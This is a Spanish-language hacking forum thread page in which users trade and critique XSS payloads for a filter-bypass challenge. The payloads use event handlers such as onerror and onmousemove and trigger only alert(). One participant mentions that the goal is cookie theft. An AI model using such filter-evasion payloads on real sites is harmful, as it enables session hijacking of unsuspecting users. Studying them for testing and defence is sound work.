elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 05:37  


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  [CYH] Bypass de filtros de XSS :)		 0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: [CYH] Bypass de filtros de XSS :)  (Leído 6,923 veces)
netscape

Desconectado Desconectado

Mensajes: 32


Ver Perfil
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #15 en: 15 Abril 2010, 22:55 »
Aquí estan los mios:

Código:
<script>>"/><a><<img src=lol.gif onerror=alert(1)> >

Código:
<script>>"/><a><<img src=lol.gif onerror=window.alert(1)> >

Código:
'>><marquee><h1>XSS</h1></marquee>

Código:
<script><TD><p onmousemove=alert('XSS') >lol </p><TABLE>

Código:
<script>><p lang="es"</p> onmouseup=alert('XSS')>>

Código:
<script>><q lang="he" dir="rtl"><p onmousedown=alert('XSS')</q></p>>

Saludos!!
« Última modificación: 16 Abril 2010, 23:33 por netscape » En línea
cgvwzq

Desconectado Desconectado

Mensajes: 57


Agente P.


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #16 en: 15 Abril 2010, 23:11 »
Pero si son todos el mismo...xD

Además, el último de netscape no es ni siquiera un bypass. ¬¬

A lo mucho se puede considerar el de SeC, que usa "style" en lugar de "script". Y da igual poner atributos, no afectan.
En línea
Some stuff:

  • www.a] parsed as ]www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.187



Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #17 en: 16 Abril 2010, 00:16 »
El último de netscape qué tiene de inyección de javascript?
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
jdc


Desconectado Desconectado

Mensajes: 3.253


janito dos cuatro...


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #18 en: 16 Abril 2010, 00:31 »
Castg no necesitas inyectar javascript para que sea xss
En línea
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.187



Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #19 en: 16 Abril 2010, 02:56 »
¬¬ pero este desafio es asi :D jajja, sino, xss en si es inyeccion HTML, y yapodemos inyectar html. lol.

la idea, es poder inyectar el codigo javascript para quitar una cookie.
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
jdc


Desconectado Desconectado

Mensajes: 3.253


janito dos cuatro...


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #20 en: 16 Abril 2010, 03:32 »
pues ya se cumplieron los 2
xD
En línea
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.187



Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #21 en: 16 Abril 2010, 03:48 »
 >:( >:(
YA SE QUE ELPRIMERO SIRVE!!

pero el segundo no!
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
jdc


Desconectado Desconectado

Mensajes: 3.253


janito dos cuatro...


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #22 en: 16 Abril 2010, 04:07 »
Si te refieres al se SeC (<STYLE TYPE="text/javascript">><a href="http://elhacker.net" onclick="alert(1)">XSS</a><</STYLE>) si sirve, debes hacer click en el enlace que se genera :D
En línea
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.187



Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #23 en: 16 Abril 2010, 04:11 »
uy dios!, hay 3!
pero los dos primeros son iguales!, es como q ponga alert(1) y en otro alert(2), la inyeccion es la misma, pero el tercero, no es de javascript!
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Bypass + iSQL
Nivel Web 		Shell Root 5 1,161 Último mensaje 1 Junio 2011, 21:01
por .mokk.
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines